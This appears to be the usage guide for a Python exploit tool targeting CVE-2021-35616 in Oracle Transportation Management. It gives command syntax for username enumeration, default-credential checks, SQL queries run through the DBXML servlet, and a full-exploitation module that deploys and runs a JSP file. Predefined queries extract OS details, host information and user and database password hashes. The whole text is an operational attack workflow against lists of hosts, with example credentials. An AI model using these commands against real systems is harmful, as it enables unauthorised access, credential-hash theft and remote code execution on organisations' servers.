Python tool for exploiting CVE-2021-35616
The script works in modules, which I implemented in the following order:
► Username enumeration
► Search for default credentials
► Run an SQL query using DBXML servlet
► Full exploitation and JSP execution
The syntax of the script is as follows:
.\ {module} {host TXT file} {additional parameters}
Username enumeration: .\ enum {hosts TXT file} -u users.txt
Search for default credentials: .\ default {hosts TXT file}
Run an SQL query using DBXML servlet: .\ query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q "select 1 from dual"
I also prepared some predefined queries that I found useful; you can access them directly, as follows:
.\ query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q os
OS – Extract the server’s OS
Osuser – Extract the OS user running the DB
Hostname – DB server host name
Hostip – DB server IP address
Passwords – Extracts the OTM users and their hashed passwords
Oraversion – The DB version
Dbusershash – The DB users’ password hashes
Dbfileslocation – The location of the DB files in the OS
Full exploitation and JSP execution: .\ exploit {hosts TXT file} -lu EBS.ADMIN -lp Aa123123 -pf "C:\Users\user\Desktop\Header_notepad.jspx"